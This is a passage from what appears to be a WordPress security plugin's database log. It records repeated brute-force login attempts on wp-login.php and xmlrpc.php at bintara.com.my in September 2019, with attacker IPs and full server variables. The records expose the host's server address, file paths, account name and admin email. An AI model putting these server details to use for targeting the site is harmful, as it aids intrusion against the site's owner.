13:33:51',18255688,19555856,'https://bintara.com.my/xmlrpc.php',1,0,'188.166.158.153'),(24136,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"145.239.180.96\";s:11:\"REMOTE_PORT\";s:5:\"34608\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@Pex0uvyt9KRYoKL8WEQAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568640891.3854\";s:12:\"REQUEST_TIME\";s:10:\"1568640891\";}}','notice','2019-09-16 13:34:52','2019-09-16 13:34:51',17739640,19230832,'https://bintara.com.my/wp-login.php',1,0,'145.239.180.96'),(24137,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"145.239.180.96\";s:11:\"REMOTE_PORT\";s:5:\"35456\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@Pfh0uvyt9KRYoKL8WEgAAAAM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568640894.2652\";s:12:\"REQUEST_TIME\";s:10:\"1568640894\";}}','notice','2019-09-16 13:34:55','2019-09-16 13:34:54',18255904,19555688,'https://bintara.com.my/xmlrpc.php',1,0,'145.239.180.96'),(24138,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"138.68.24.138\";s:11:\"REMOTE_PORT\";s:5:\"62414\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@RRx0uvyt9KRYoKL8XLQAAAA8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568641351.9434\";s:12:\"REQUEST_TIME\";s:10:\"1568641351\";}}','notice','2019-09-16 13:42:33','2019-09-16 13:42:32',17738104,19229360,'https://bintara.com.my/wp-login.php',1,0,'138.68.24.138'),(24139,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"138.68.24.138\";s:11:\"REMOTE_PORT\";s:5:\"63020\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@RSh0uvyt9KRYoKL8XLgAAAAU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568641354.7886\";s:12:\"REQUEST_TIME\";s:10:\"1568641354\";}}','notice','2019-09-16 13:42:36','2019-09-16 13:42:35',18255456,19554600,'https://bintara.com.my/xmlrpc.php',1,0,'138.68.24.138'),(24140,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"56079\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@RrB0uvyt9KRYoKL8XUQAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568641452.4981\";s:12:\"REQUEST_TIME\";s:10:\"1568641452\";}}','notice','2019-09-16 13:44:13','2019-09-16 13:44:12',17737160,19228120,'https://bintara.com.my/wp-login.php',1,0,'31.14.128.73'),(24141,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"31.14.128.73\";s:11:\"REMOTE_PORT\";s:5:\"56396\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@Rrx0uvyt9KRYoKL8XUwAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568641455.5653\";s:12:\"REQUEST_TIME\";s:10:\"1568641455\";}}','notice','2019-09-16 13:44:16','2019-09-16 13:44:15',18256336,19556176,'https://bintara.com.my/xmlrpc.php',1,0,'31.14.128.73'),(24142,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"132.148.157.66\";s:11:\"REMOTE_PORT\";s:5:\"44266\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@U2x0uvyt9KRYoKL8Y9QAAABg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568642268.0445\";s:12:\"REQUEST_TIME\";s:10:\"1568642268\";}}','notice','2019-09-16 13:57:49','2019-09-16 13:57:48',17737328,19227440,'https://bintara.com.my/wp-login.php',1,0,'132.148.157.66'),(24143,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"132.148.157.66\";s:11:\"REMOTE_PORT\";s:5:\"44854\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@U3x0uvyt9KRYoKL8Y9wAAAAo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568642271.3003\";s:12:\"REQUEST_TIME\";s:10:\"1568642271\";}}','notice','2019-09-16 13:57:52','2019-09-16 13:57:51',18255264,19554960,'https://bintara.com.my/xmlrpc.php',1,0,'132.148.157.66'),(24144,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.12.18\";s:11:\"REMOTE_PORT\";s:5:\"48960\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@WcWCCaIOMm5l5jJFGawAAAQM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568642673.4673\";s:12:\"REQUEST_TIME\";s:10:\"1568642673\";}}','notice','2019-09-16 14:04:34','2019-09-16 